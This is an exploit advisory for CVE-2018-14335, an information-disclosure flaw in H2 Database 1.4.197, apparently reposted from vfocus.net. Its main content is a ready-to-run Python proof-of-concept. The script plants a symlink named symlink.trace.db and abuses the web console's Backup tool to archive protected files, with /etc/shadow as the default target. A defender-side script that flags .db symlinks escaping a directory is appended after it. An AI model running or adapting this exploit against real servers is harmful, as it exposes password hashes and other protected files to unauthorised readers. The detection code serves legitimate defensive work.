H2 Database 1.4.197 Information Disclosure
Source: vfocus.net  Author: owodelta  Published: 2018-07-31
# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335
 
# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.
 
# PS, thanks to HTB and our team FallenAngels
 
#!/usr/bin/python
 
import requests
import argparse
import os
import random
 
def cleanup(wdir):
    cmd = "rm {}symlink.trace.db".format(wdir)
    os.system(cmd)
 
def create_symlink(file, wdir):
    cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
    os.system(cmd)
 
 
def trigger_symlink(host, wdir):
    outputName = str(random.randint(1000,10000))+".zip"
    #get cookie
    url = 'http://{}'.format(host)
    r = requests.get(url)
    path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
    url = '{}/{}'.format(url,path)
    payload = {
            "tool":"Backup",
            "args":"-file,"+wdir+outputName+",-dir,"+wdir}
    #print url
    requests.post(url,data=payload).text
    print "File is zipped in: "+wdir+outputName
 
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    required = parser.add_argument_group('required arguments')
    required.add_argument("-H",
            "--host",
            metavar='127.0.0.1:8082',
            help="Target host",
            required=True)
    required.add_argument("-D",
            "--dir",
            metavar="/tmp/",
            default="/tmp/",
            help="Writable directory")
    required.add_argument("-F",
            "--file",
            metavar="/etc/shadow",
            default="/etc/shadow",
            help="Desired file to read",)
    args = parser.parse_args()
 
    create_symlink(args.file,args.dir)
    trigger_symlink(args.host,args.dir)
    cleanup(args.dir)
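
Defender-side check for the condition described above, as an added example that is not part of the original advisory or of H2: it lists database-named entries in a directory that are symlinks and flags those resolving outside it. The ".db" suffix filter, the function names and the sample file names other than symlink.trace.db are assumptions made for illustration.

```python
import os
import tempfile

# Assumption: any entry ending in ".db" may be picked up by a directory backup
# (the PoC above plants a link named "symlink.trace.db").
DB_SUFFIX = ".db"

def find_symlinked_db_files(base_dir):
    """Return (link_path, resolved_target, escapes_dir) for each *.db symlink."""
    base_real = os.path.realpath(base_dir)
    findings = []
    for entry in sorted(os.scandir(base_real), key=lambda e: e.name):
        if not entry.name.endswith(DB_SUFFIX):
            continue
        # is_symlink() inspects the entry itself and never follows the link
        if not entry.is_symlink():
            continue
        target = os.path.realpath(entry.path)
        # The link escapes when its resolved target is not under the directory
        escapes = os.path.commonpath([base_real, target]) != base_real
        findings.append((entry.path, target, escapes))
    return findings

def demo():
    """Constructed sample: a regular DB file, a link inside the dir, a link leaving it."""
    with tempfile.TemporaryDirectory() as root:
        dbdir = os.path.join(root, "h2data")
        os.mkdir(dbdir)
        outside = os.path.join(root, "outside.txt")  # stands in for a sensitive file
        for path in (outside, os.path.join(dbdir, "test.mv.db")):
            with open(path, "w") as handle:
                handle.write("constructed sample\n")
        os.symlink(os.path.join(dbdir, "test.mv.db"),
                   os.path.join(dbdir, "inner.trace.db"))
        os.symlink(outside, os.path.join(dbdir, "symlink.trace.db"))
        return [(os.path.basename(link), escapes)
                for link, _target, escapes in find_symlinked_db_files(dbdir)]

if __name__ == "__main__":
    for name, escapes in demo():
        status = "ESCAPES DIRECTORY" if escapes else "stays inside"
        print("{}: symlink, {}".format(name, status))
```

Run against the directory passed to the backup tool's -dir argument before the archive is written; a database directory normally contains no symlinks, so any finding deserves review.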


 